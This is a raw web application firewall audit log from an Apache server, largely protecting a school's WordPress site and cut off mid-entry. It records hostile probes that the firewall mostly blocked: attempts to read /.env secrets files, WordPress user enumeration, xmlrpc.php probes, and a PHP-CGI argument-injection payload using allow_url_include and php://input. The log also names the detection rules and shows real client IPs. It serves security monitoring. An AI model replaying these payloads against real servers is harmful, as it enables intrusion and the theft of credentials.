X-Forwarded-For: 154.213.195.204 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --33c39f11-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --33c39f11-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745447147620494 3270 (- - -) Stopwatch2: 1745447147620494 3270; combined=1423, p1=472, p2=911, p3=0, p4=0, p5=40, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --33c39f11-Z-- --0c5ff22e-A-- [24/Apr/2025:05:25:58 +0700] aAlo9t5yz20UX9VrdZMEqgAAAFA 103.236.140.4 41694 103.236.140.4 8181 --0c5ff22e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.195.204 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.195.204 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --0c5ff22e-C-- demo.sayHello --0c5ff22e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --0c5ff22e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745447158132676 7031 (- - -) Stopwatch2: 1745447158132676 7031; combined=5028, p1=658, p2=4002, p3=42, p4=42, p5=198, sr=132, sw=86, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0c5ff22e-Z-- --b59f316b-A-- [24/Apr/2025:06:43:50 +0700] aAl7Nt5yz20UX9VrdZMJWQAAAFA 103.236.140.4 59402 103.236.140.4 8181 --b59f316b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.88.89 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.88.89 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; U; Android 1.1; en-gb; dream) AppleWebKit/525.10 (KHTML, like Gecko) Version/3.0.4 Mobile Safari/523.12.2 Accept-Charset: utf-8 --b59f316b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b59f316b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745451830442811 926 (- - -) Stopwatch2: 1745451830442811 926; combined=383, p1=313, p2=0, p3=0, p4=0, p5=70, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b59f316b-Z-- --1938c309-A-- [24/Apr/2025:06:44:16 +0700] aAl7UGLuk3f9kLjsdTbE3gAAAIs 103.236.140.4 59502 103.236.140.4 8181 --1938c309-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.88.89 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.88.89 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.35 Safari/537.36 Accept-Charset: utf-8 --1938c309-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1938c309-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745451856567226 821 (- - -) Stopwatch2: 1745451856567226 821; combined=353, p1=314, p2=0, p3=0, p4=0, p5=39, sr=117, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1938c309-Z-- --2e828634-A-- [24/Apr/2025:06:53:22 +0700] aAl9cmLuk3f9kLjsdTbFRgAAAI4 103.236.140.4 33274 103.236.140.4 8181 --2e828634-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 202.104.161.131 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 202.104.161.131 X-Forwarded-Proto: https Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --2e828634-C-- --2e828634-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2e828634-E-- --2e828634-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745452402867613 4501 (- - -) Stopwatch2: 1745452402867613 4501; combined=3060, p1=455, p2=2573, p3=0, p4=0, p5=32, sr=77, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2e828634-Z-- --4de3cc67-A-- [24/Apr/2025:07:48:59 +0700] aAmKe95yz20UX9VrdZMMtAAAAEc 103.236.140.4 46086 103.236.140.4 8181 --4de3cc67-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.84.16 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.84.16 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --4de3cc67-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4de3cc67-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745455739191613 3347 (- - -) Stopwatch2: 1745455739191613 3347; combined=1427, p1=452, p2=943, p3=0, p4=0, p5=31, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4de3cc67-Z-- --8e869228-A-- [24/Apr/2025:07:49:05 +0700] aAmKgclQo524fhbIj1yvKwAAAAI 103.236.140.4 46110 103.236.140.4 8181 --8e869228-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.84.16 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.84.16 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --8e869228-C-- demo.sayHello --8e869228-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --8e869228-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745455745344559 6531 (- - -) Stopwatch2: 1745455745344559 6531; combined=4719, p1=588, p2=3877, p3=32, p4=35, p5=110, sr=77, sw=77, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8e869228-Z-- --2a746331-A-- [24/Apr/2025:08:18:19 +0700] aAmRW95yz20UX9VrdZMOoAAAAEY 103.236.140.4 52782 103.236.140.4 8181 --2a746331-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.106 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.106 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36 Accept-Charset: utf-8 --2a746331-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2a746331-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745457499455136 13544 (- - -) Stopwatch2: 1745457499455136 13544; combined=25904, p1=295, p2=0, p3=0, p4=0, p5=12823, sr=75, sw=0, l=0, gc=12786 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2a746331-Z-- --fc73bb18-A-- [24/Apr/2025:08:18:49 +0700] aAmRed5yz20UX9VrdZMOtQAAAFY 103.236.140.4 52896 103.236.140.4 8181 --fc73bb18-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.106 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.106 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0 Accept-Charset: utf-8 --fc73bb18-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fc73bb18-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745457529994179 757 (- - -) Stopwatch2: 1745457529994179 757; combined=337, p1=300, p2=0, p3=0, p4=0, p5=36, sr=80, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fc73bb18-Z-- --d7bb7c31-A-- [24/Apr/2025:08:33:31 +0700] aAmU68lQo524fhbIj1yxugAAAAU 103.236.140.4 56372 103.236.140.4 8181 --d7bb7c31-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 138.197.131.145 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 138.197.131.145 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --d7bb7c31-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d7bb7c31-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745458411294163 807 (- - -) Stopwatch2: 1745458411294163 807; combined=346, p1=307, p2=0, p3=0, p4=0, p5=39, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d7bb7c31-Z-- --4ee6fa74-A-- [24/Apr/2025:09:09:28 +0700] aAmdWGLuk3f9kLjsdTbNowAAAIw 103.236.140.4 37060 103.236.140.4 8181 --4ee6fa74-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.203.244 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.203.244 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --4ee6fa74-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4ee6fa74-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745460568861609 2362 (- - -) Stopwatch2: 1745460568861609 2362; combined=1225, p1=404, p2=792, p3=0, p4=0, p5=29, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4ee6fa74-Z-- --6ee7545a-A-- [24/Apr/2025:09:09:37 +0700] aAmdYclQo524fhbIj1y0EwAAAA8 103.236.140.4 37100 103.236.140.4 8181 --6ee7545a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.203.244 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.203.244 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --6ee7545a-C-- demo.sayHello --6ee7545a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --6ee7545a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745460577755840 5878 (- - -) Stopwatch2: 1745460577755840 5878; combined=4443, p1=550, p2=3653, p3=31, p4=35, p5=103, sr=74, sw=71, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6ee7545a-Z-- --9d339463-A-- [24/Apr/2025:10:18:40 +0700] aAmtkN5yz20UX9VrdZMT5wAAAE4 103.236.140.4 52728 103.236.140.4 8181 --9d339463-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 172.94.24.98 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 172.94.24.98 X-Forwarded-Proto: https Connection: close Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) --9d339463-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9d339463-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745464720406429 3140 (- - -) Stopwatch2: 1745464720406429 3140; combined=1526, p1=494, p2=934, p3=0, p4=0, p5=98, sr=120, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9d339463-Z-- --1e2b2020-A-- [24/Apr/2025:10:56:21 +0700] aAm2ZWLuk3f9kLjsdTbTngAAAJE 103.236.140.4 33094 103.236.140.4 8181 --1e2b2020-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.87.86 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.87.86 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; Redmi Note 5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36 Accept-Charset: utf-8 --1e2b2020-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1e2b2020-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745466981057842 874 (- - -) Stopwatch2: 1745466981057842 874; combined=386, p1=347, p2=0, p3=0, p4=0, p5=39, sr=126, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1e2b2020-Z-- --5247eb66-A-- [24/Apr/2025:12:37:41 +0700] aAnOJclQo524fhbIj1zA7QAAAA8 103.236.140.4 56628 103.236.140.4 8181 --5247eb66-B-- GET /.env HTTP/1.0 Host: wooin.epicgamer.org X-Real-IP: 46.101.111.185 X-Forwarded-Host: wooin.epicgamer.org X-Forwarded-Server: wooin.epicgamer.org X-Forwarded-For: 46.101.111.185 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --5247eb66-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5247eb66-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745473061780126 733 (- - -) Stopwatch2: 1745473061780126 733; combined=287, p1=250, p2=0, p3=0, p4=0, p5=37, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5247eb66-Z-- --db5cf12c-A-- [24/Apr/2025:13:41:09 +0700] aAndBd5yz20UX9VrdZMrfgAAAFY 103.236.140.4 56552 103.236.140.4 8181 --db5cf12c-B-- GET /.env HTTP/1.0 Host: mignere.twilightparadox.com X-Real-IP: 157.230.19.140 X-Forwarded-Host: mignere.twilightparadox.com X-Forwarded-Server: mignere.twilightparadox.com X-Forwarded-For: 157.230.19.140 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --db5cf12c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --db5cf12c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745476869100032 860 (- - -) Stopwatch2: 1745476869100032 860; combined=404, p1=355, p2=0, p3=0, p4=0, p5=49, sr=136, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --db5cf12c-Z-- --a4c9176c-A-- [24/Apr/2025:14:09:47 +0700] aAnju2Luk3f9kLjsdTbsIwAAAIQ 103.236.140.4 55578 103.236.140.4 8181 --a4c9176c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.91.172 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.91.172 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a4c9176c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a4c9176c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745478587511990 2778 (- - -) Stopwatch2: 1745478587511990 2778; combined=1482, p1=481, p2=962, p3=0, p4=0, p5=39, sr=97, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a4c9176c-Z-- --7f3e6026-A-- [24/Apr/2025:14:09:52 +0700] aAnjwGLuk3f9kLjsdTbsJQAAAII 103.236.140.4 55602 103.236.140.4 8181 --7f3e6026-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.91.172 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.91.172 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --7f3e6026-C-- demo.sayHello --7f3e6026-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --7f3e6026-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745478592494541 6410 (- - -) Stopwatch2: 1745478592494541 6410; combined=4878, p1=622, p2=3942, p3=32, p4=35, p5=138, sr=74, sw=109, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7f3e6026-Z-- --fbe3a76d-A-- [24/Apr/2025:15:34:14 +0700] aAn3ht5yz20UX9VrdZM2IwAAAEw 103.236.140.4 46850 103.236.140.4 8181 --fbe3a76d-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 216.73.161.121 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 216.73.161.121 X-Forwarded-Proto: 